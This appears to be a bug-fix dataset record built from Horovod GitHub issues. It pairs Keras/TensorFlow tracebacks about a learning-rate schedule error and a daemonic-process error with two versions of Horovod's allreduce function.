self._sparse_as_dense = sparse_as_dense
self._get_gradients_used = False
super(self.__class__, self).__init__(**config)
|
https://github.com/horovod/horovod/issues/1573
|
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 541, in __getattribute__
[1,0]<stderr>: return super(OptimizerV2, self).__getattribute__(name)
[1,0]<stderr>:AttributeError: 'Adam' object has no attribute 'lr'
[1,0]<stderr>:
[1,0]<stderr>:During handling of the above exception, another exception occurred:
[1,0]<stderr>:
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "tensorflow_keras_mnist.py", line 94, in <module>
[1,0]<stderr>: mnist_model.fit(dataset, steps_per_epoch=500 // hvd.size(), callbacks=callbacks, epochs=24, verbose=verbose)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training.py", line 728, in fit
[1,0]<stderr>: use_multiprocessing=use_multiprocessing)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training_generator.py", line 693, in fit
[1,0]<stderr>: steps_name='steps_per_epoch')
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training_generator.py", line 196, in model_iteration
[1,0]<stderr>: callbacks._call_begin_hook(mode)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/callbacks.py", line 249, in _call_begin_hook
[1,0]<stderr>: self.on_train_begin()
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/callbacks.py", line 365, in on_train_begin
[1,0]<stderr>: callback.on_train_begin(logs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/horovod/_keras/callbacks.py", line 137, in on_train_begin
[1,0]<stderr>: self.initial_lr = self.backend.get_value(self.model.optimizer.lr)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 550, in __getattribute__
[1,0]<stderr>: return self._get_hyper(name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 527, in _get_hyper
[1,0]<stderr>: self._create_hypers()
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 643, in _create_hypers
[1,0]<stderr>: aggregation=tf_variables.VariableAggregation.ONLY_FIRST_REPLICA)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 805, in add_weight
[1,0]<stderr>: aggregation=aggregation)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/training/tracking/base.py", line 744, in _add_variable_with_custom_getter
[1,0]<stderr>: **kwargs_for_getter)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/base_layer_utils.py", line 139, in make_variable
[1,0]<stderr>: shape=variable_shape if variable_shape else None)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 258, in __call__
[1,0]<stderr>: return cls._variable_v1_call(*args, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 219, in _variable_v1_call
[1,0]<stderr>: shape=shape)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 197, in <lambda>
[1,0]<stderr>: previous_getter = lambda **kwargs: default_variable_creator(None, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variable_scope.py", line 2507, in default_variable_creator
[1,0]<stderr>: shape=shape)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 262, in __call__
[1,0]<stderr>: return super(VariableMetaclass, cls).__call__(*args, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/resource_variable_ops.py", line 1406, in __init__
[1,0]<stderr>: distribute_strategy=distribute_strategy)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/resourc[1,0]<stderr>:e_variable_ops.py", line 1538, in _init_from_args
[1,0]<stderr>: name="initial_value", dtype=dtype)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1184, in convert_to_tensor
[1,0]<stderr>: return convert_to_tensor_v2(value, dtype, preferred_dtype, name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1242, in convert_to_tensor_v2
[1,0]<stderr>: as_ref=False)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1296, in internal_convert_to_tensor
[1,0]<stderr>: ret = conversion_func(value, dtype=dtype, name=name, as_ref=as_ref)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 286, in _constant_tensor_conversion_function
[1,0]<stderr>: return constant(v, dtype=dtype, name=name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 227, in constant
[1,0]<stderr>: allow_broadcast=True)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 235, in _constant_impl
[1,0]<stderr>: t = convert_to_eager_tensor(value, ctx, dtype)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 96, in convert_to_eager_tensor
[1,0]<stderr>: return ops.EagerTensor(value, ctx.device_name, dtype)
[1,0]<stderr>:ValueError: Attempt to convert a value ({'class_name': 'ExponentialDecay', 'config': {'initial_learning_rate': 0.001, 'decay_steps': 100000, 'decay_rate': 0.96, 'staircase': True, 'name': None}}) with an unsupported type (<class 'dict'>) to a Tensor.
[1,0]<stderr>:Exception ignored in: <function _RandomSeedGeneratorDeleter.__del__ at 0x7f7dec944a70>
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/data/ops/dataset_ops.py", line 3009, in __del__
[1,0]<stderr>:AttributeError: 'NoneType' object has no attribute 'device'
--------------------------------------------------------------------------
Primary job terminated normally, but 1 process returned
a non-zero exit code. Per user-direction, the job has been aborted.
--------------------------------------------------------------------------
|
AttributeError
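The ValueError in the traceback above can be reproduced without Horovod: when the optimizer is built with a LearningRateSchedule, get_config() serializes the learning rate as a dict, which cannot be converted to a scalar tensor. A minimal sketch, assuming TF 2.x:

import tensorflow as tf

schedule = tf.keras.optimizers.schedules.ExponentialDecay(
    initial_learning_rate=0.001, decay_steps=100000, decay_rate=0.96,
    staircase=True)
opt = tf.keras.optimizers.Adam(learning_rate=schedule)
cfg = opt.get_config()
# The learning rate is serialized as a schedule-describing dict, not a float,
# so code that reads optimizer.lr as a scalar tensor fails.
print(type(cfg["learning_rate"]))  # <class 'dict'>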
|
def allreduce(
tensor,
average=None,
device_dense="",
device_sparse="",
compression=Compression.none,
op=None,
):
"""Perform an allreduce on a tf.Tensor or tf.IndexedSlices.
This function performs a bandwidth-optimal ring allreduce on the input
tensor. If the input is a tf.IndexedSlices, the function instead does an
allgather on the values and the indices, effectively doing an allreduce on
the represented tensor.
Arguments:
tensor: tf.Tensor, tf.Variable, or tf.IndexedSlices to reduce.
The shape of the input must be identical across all ranks.
average: DEPRECATED, please use op instead.
device_dense: Device to be used for dense tensors. Uses GPU by default
if Horovod was built with HOROVOD_GPU_ALLREDUCE.
device_sparse: Device to be used for sparse tensors. Uses GPU by default
if Horovod was built with HOROVOD_GPU_ALLGATHER.
compression: Compression algorithm used to reduce the amount of data
sent and received by each worker node. Defaults to not
using compression.
op: The reduction operation to combine tensors across different ranks.
Defaults to Average if None is given.
Returns:
A tensor of the same shape and type as `tensor`, summed across all
processes.
"""
op = handle_average_backwards_compatibility(op, average)
# Averaging happens in framework code, so translate that to Sum for the actual call
true_op = Sum if op == Average else op
if isinstance(tensor, tf.IndexedSlices):
# TODO: Need to fix this to actually call Adasum
if op == Adasum:
raise NotImplementedError(
"The Adasum reduction does not currently support sparse tensors. As a "
"workaround please pass sparse_as_dense=True to DistributedOptimizer"
)
with tf.device(device_sparse):
# For IndexedSlices, do two allgathers instead of an allreduce.
horovod_size = tf.cast(size(), tensor.values.dtype)
values = allgather(tensor.values)
indices = allgather(tensor.indices)
# To make this operation into an average, divide allgathered values by
# the Horovod size.
new_values = (values / horovod_size) if op == Average else values
return tf.IndexedSlices(new_values, indices, dense_shape=tensor.dense_shape)
else:
with tf.device(device_dense):
horovod_size = tf.cast(size(), dtype=tensor.dtype)
tensor_compressed, ctx = compression.compress(tensor)
summed_tensor_compressed = _allreduce(tensor_compressed, op=true_op)
summed_tensor = compression.decompress(summed_tensor_compressed, ctx)
if op == Adasum:
if "CPU" not in tensor.device and gpu_available("tensorflow"):
if nccl_built():
if not is_homogeneous:
raise NotImplementedError(
"Running GPU Adasum on heterogeneous cluster is not supported yet."
)
elif not check_num_rank_power_of_2(int(size() / local_size())):
raise NotImplementedError(
"Running GPU Adasum with non-power of 2 nodes is not supported yet."
)
horovod_local_size = tf.cast(local_size(), dtype=tensor.dtype)
new_tensor = summed_tensor / horovod_local_size
else:
warnings.warn(
"Adasum reduction does not currently support GPU reduction using MPI. Tensors "
"are copied to CPU memory instead. To use Adasum for GPU reduction, please "
"compile Horovod with HOROVOD_GPU_ALLREDUCE=NCCL."
)
new_tensor = summed_tensor
else:
if not check_num_rank_power_of_2(size()):
raise NotImplementedError(
"Running Adasum with non-power of 2 ranks is not supported yet."
)
new_tensor = summed_tensor
else:
new_tensor = (
(summed_tensor / horovod_size) if op == Average else summed_tensor
)
return new_tensor
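A minimal single-process smoke test of the allreduce API above (with one rank the average equals the input); this assumes Horovod built with TensorFlow support and TF 2.x eager execution:

import tensorflow as tf
import horovod.tensorflow as hvd

hvd.init()
avg = hvd.allreduce(tf.constant([1.0, 2.0, 3.0]))  # element-wise mean across ranks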
|
def allreduce(
tensor,
average=None,
device_dense="",
device_sparse="",
compression=Compression.none,
op=None,
):
"""Perform an allreduce on a tf.Tensor or tf.IndexedSlices.
This function performs a bandwidth-optimal ring allreduce on the input
tensor. If the input is a tf.IndexedSlices, the function instead does an
allgather on the values and the indices, effectively doing an allreduce on
the represented tensor.
Arguments:
tensor: tf.Tensor, tf.Variable, or tf.IndexedSlices to reduce.
The shape of the input must be identical across all ranks.
average: DEPRECATED, please use op instead.
device_dense: Device to be used for dense tensors. Uses GPU by default
if Horovod was built with HOROVOD_GPU_ALLREDUCE.
device_sparse: Device to be used for sparse tensors. Uses GPU by default
if Horovod was built with HOROVOD_GPU_ALLGATHER.
compression: Compression algorithm used to reduce the amount of data
sent and received by each worker node. Defaults to not
using compression.
op: The reduction operation to combine tensors across different ranks.
Defaults to Average if None is given.
Returns:
A tensor of the same shape and type as `tensor`, summed across all
processes.
"""
op = handle_average_backwards_compatibility(op, average)
# Averaging happens in framework code, so translate that to Sum for the actual call
true_op = Sum if op == Average else op
if isinstance(tensor, tf.IndexedSlices):
# TODO: Need to fix this to actually call Adasum
if op == Adasum:
raise NotImplementedError(
"The Adasum reduction does not currently support "
"sparse tensors. As a workaround please pass sparse_as_dense=True to "
"DistributedOptimizer"
)
with tf.device(device_sparse):
# For IndexedSlices, do two allgathers instead of an allreduce.
horovod_size = tf.cast(size(), tensor.values.dtype)
values = allgather(tensor.values)
indices = allgather(tensor.indices)
# To make this operation into an average, divide allgathered values by
# the Horovod size.
new_values = (values / horovod_size) if op == Average else values
return tf.IndexedSlices(new_values, indices, dense_shape=tensor.dense_shape)
else:
with tf.device(device_dense):
horovod_size = tf.cast(size(), dtype=tensor.dtype)
tensor_compressed, ctx = compression.compress(tensor)
summed_tensor_compressed = _allreduce(tensor_compressed, op=true_op)
summed_tensor = compression.decompress(summed_tensor_compressed, ctx)
if op == Adasum:
if "CPU" not in tensor.device and has_gpu:
if nccl_built():
if not is_homogeneous:
raise NotImplementedError(
"Running GPU Adasum on heterogeneous cluster is not supported yet."
)
elif not check_num_rank_power_of_2(int(size() / local_size())):
raise NotImplementedError(
"Running GPU Adasum with non-power of 2 nodes is not supported yet."
)
horovod_local_size = tf.cast(local_size(), dtype=tensor.dtype)
new_tensor = summed_tensor / horovod_local_size
else:
warnings.warn(
"Adasum reduction does not currently support "
"GPU reduction using MPI. Tensors are copied to CPU memory instead."
"To use Adasum for GPU reduction, please compile Horovod with HOROVOD_GPU_ALLREDUCE=NCCL."
)
new_tensor = summed_tensor
else:
if not check_num_rank_power_of_2(size()):
raise NotImplementedError(
"Running Adasum with non-power of 2 ranks is not supported yet."
)
new_tensor = summed_tensor
else:
new_tensor = (
(summed_tensor / horovod_size) if op == Average else summed_tensor
)
return new_tensor
|
https://github.com/horovod/horovod/issues/1568
|
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension tensorflow was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/tensorflow/__init__.py", line 43, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || has_gpu = gpu_available('tensorflow')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension tensorflow was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension torch was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 39, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || from horovod.torch.mpi_ops import allreduce, allreduce_async, allreduce_, allreduce_async_
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 80, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _has_gpu = gpu_available('torch')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension torch was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension mxnet was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/mxnet/__init__.py", line 23, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || __file__, 'mpi_lib')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 51, in check_extension
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'Horovod with %s=1 to debug the build error.' % (ext_name, ext_env_var))
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension mxnet was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ImportError: Extension horovod.mxnet has not been built. If this is not expected, reinstall Horovod with HOROVOD_WITH_MXNET=1 to debug the build error.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension tensorflow was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
